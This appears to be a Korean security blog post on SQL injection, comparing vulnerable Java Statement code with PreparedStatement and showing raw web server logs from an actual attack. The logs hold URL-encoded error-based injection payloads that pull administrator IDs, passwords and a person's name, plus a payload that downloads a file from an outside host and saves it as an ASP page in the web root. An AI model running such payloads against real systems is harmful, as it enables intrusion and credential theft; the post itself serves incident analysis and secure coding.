sql injection 취약점 공격 로그

취약한 코딩 Statement

Statement stmt = conn.createStatement();
ResultSet rs =  stmt.executeQuery("select count(*) as cnt from member where userid='"+userid+"' and password='"+password+"'");

시큐어 코딩 Prepared Statement

PreparedStatement stmt = conn.prepareStatement("select count(*) from member where userid=? and password=?");
stmt.setString(1, userid);
stmt.setString(2, password);
ResultSet rs = stmt.executeQuery();

잘못된 시큐어 코딩 Prepared Statement

PreparedStatement stmt =  conn.prepareStatement("select count(*) from member where userid='" + userid + "'" and password='" + password + "'");

 

PreparedStatement  사용하면 메모리에서 파라메터가 바인딩 될때 실행이 되지 않게 ''감싸지게 되는데 +로 저렇게 구현하면 물음표(?)가 아니라서 감싸지지 않는다.

sql injection 공격은 한번에 성공 시키기가 힘들다. 테이블명과 칼럼명을 에러코드를 보고 유추 해야 된다. 그래서 해당 취약점으로 침해사고 발생시 http error code 500을 검색 하면 된다.

 

2013-05-31 07:09:28 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20and%20(select%20top%201%20isnull(cast([adminid]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([passwd]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]%20as%20nvarchar(4000)),char(32))%20from%20targetdomain_web..lpc_admin%20where%201=1%20and%20adminid%20not%20in%20(select%20top%203%20adminid%20from%20targetdomain_web..lpc_admin%20where%201=1%20group%20by%20adminid))%3E0%20and%201%3C2|108|80040e07|nvarchar_값_'superadmin^superadmin^최상위_관리자'을(를)_데이터_형식_int(으)로_변환하지_못했습니다. 80 - 114.207.246.162 500 0 0 115
2013-05-31 07:09:29 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20and%20(select%20top%201%20isnull(cast([adminid]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([passwd]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]%20as%20nvarchar(4000)),char(32))%20from%20targetdomain_web..lpc_admin%20where%201=1%20and%20adminid%20not%20in%20(select%20top%204%20adminid%20from%20targetdomain_web..lpc_admin%20where%201=1%20group%20by%20adminid))%3E0%20and%201%3C2|108|80040e07|nvarchar_값_'test^123456^_'을(를)_데이터_형식_int(으)로_변환하지_못했습니다. 80 - 114.207.246.162 500 0 0 117
2013-05-31 07:09:29 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20and%20(select%20top%201%20isnull(cast([adminid]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([passwd]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]%20as%20nvarchar(4000)),char(32))%20from%20targetdomain_web..lpc_admin%20where%201=1%20and%20adminid%20not%20in%20(select%20top%205%20adminid%20from%20targetdomain_web..lpc_admin%20where%201=1%20group%20by%20adminid))%3E0%20and%201%3C2|108|80040e07|nvarchar_값_'wonny0125^wonny0125^임원근'을(를)_데이터_형식_int(으)로_변환하지_못했습니다. 80 - 114.207.246.162 500 0 0 113
2013-05-31 07:06:15 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20;declare%20@b%20varbinary(8000),@hr%20int,@http%20int,@down%20int%20exec%20sp_oacreate%20[microsoft.xmlhttp],@http%20output%20exec%20@hr%20=%20sp_oamethod%20@http,[open],null,[get],[http://sms.garosu.com/i/i/db.txt],0%20exec%20@hr%20=%20sp_oamethod%20@http,[send],null%20exec%20@hr=sp_oagetproperty%20@http,[responsebody],@b%20output%20exec%20@hr=sp_oacreate%20[adodb.stream],@down%20output%20exec%20@hr=sp_oasetproperty%20@down,[type],1%20exec%20@hr=sp_oasetproperty%20@down,[mode],3%20exec%20@hr=sp_oamethod%20@down,[open],null%20exec%20@hr=sp_oamethod%20@down,[write],null,@b%20exec%20@hr=sp_oamethod%20@down,[savetofile],null,[d:%5Cweb%5Cweb_targetdomain2011%5Cdp.asp],1%20;-- 80 - 114.207.246.162 200 0 0 344